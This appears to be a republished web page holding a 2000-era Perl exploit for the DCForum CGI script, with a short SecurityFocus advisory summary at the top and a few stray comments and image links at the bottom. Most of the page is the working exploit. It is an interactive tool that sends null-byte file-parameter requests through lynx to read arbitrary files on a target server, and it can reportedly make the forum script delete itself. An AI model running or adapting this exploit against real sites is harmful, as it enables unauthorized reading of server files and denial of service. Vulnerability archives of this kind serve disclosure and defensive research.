# source: http://www.securityfocus.com/bid/1951/info
#
# DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
#
#The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.
#
#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To
CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR,">errors.txt"); } error checking
$lynx = "/usr/bin/lynx"; # specify
$site = $ARGV[0];
$cgi = $ARGV[1];
$inet = inet_aton($site);
die "nt--- Usage:$0 <site> <cgi location,duh> ---" if(@ARGV == '0' ||
@ARGV < 2);
print "nt--- DCForum 1.0 - 6.0 Exploit ---";
print "nt--- By the cool fellas at * ---nn";
while(true) { # yea i think I stole this from the pollex.pl , uh thanks.
print "[dcforum]Option:";
$action = <STDIN>;
chomp($action);
print "Valid Options: r(read files, usage r <file>), q(quit)n" if($action
ne "r" || $action ne "q");
if ($action eq "r") {
print "nFile(to read):";
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = "?az=list&file=$file%00";
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq "q") {
print "now exiting programn";
exit;
}
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]
![图片[1]-DCForum cgforum.cgi CG脚本取任意文件且删除程序本身漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-DCForum cgforum.cgi CG脚本取任意文件且删除程序本身漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666